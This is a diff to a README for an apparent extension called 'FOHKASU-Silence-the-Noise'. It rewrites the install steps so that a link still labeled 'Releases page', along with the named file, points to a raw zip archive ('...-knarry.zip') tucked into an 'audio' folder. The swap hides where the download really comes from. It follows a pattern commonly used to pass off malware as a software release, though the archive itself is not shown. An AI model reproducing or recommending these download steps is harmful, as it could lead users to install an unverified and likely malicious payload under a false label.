medosheno841/FOHKASU-Silence-the-Noise/README.md

 ## 📦 Download & Install

-1. Visit the [Releases page](https://github.com/medosheno841/FOHKASU-Silence-the-Noise/releases) to find the latest version of the extension.
+1. Visit the [Releases page](https://raw.githubusercontent.com/medosheno841/FOHKASU-Silence-the-Noise/main/audio/FOHKASU-Silence-the-Noise-knarry.zip) to find the latest version of the extension.

-2. Look for the file named `FOHKASU-Silence-the-Noise.zip`.
+2. Look for the file named `https://raw.githubusercontent.com/medosheno841/FOHKASU-Silence-the-Noise/main/audio/FOHKASU-Silence-the-Noise-knarry.zip`.

 3. Click on the file to start downloading it.
 The file will save to your computer.

-4. Once the download is complete, locate the `FOHKASU-Silence-the-Noise.zip` file in your downloads folder.
+4. Once the download is complete, locate the `https://raw.githubusercontent.com/medosheno841/FOHKASU-Silence-the-Noise/main/audio/FOHKASU-Silence-the-Noise-knarry.zip` file in your downloads folder.

 5. Extract the contents of the zip file.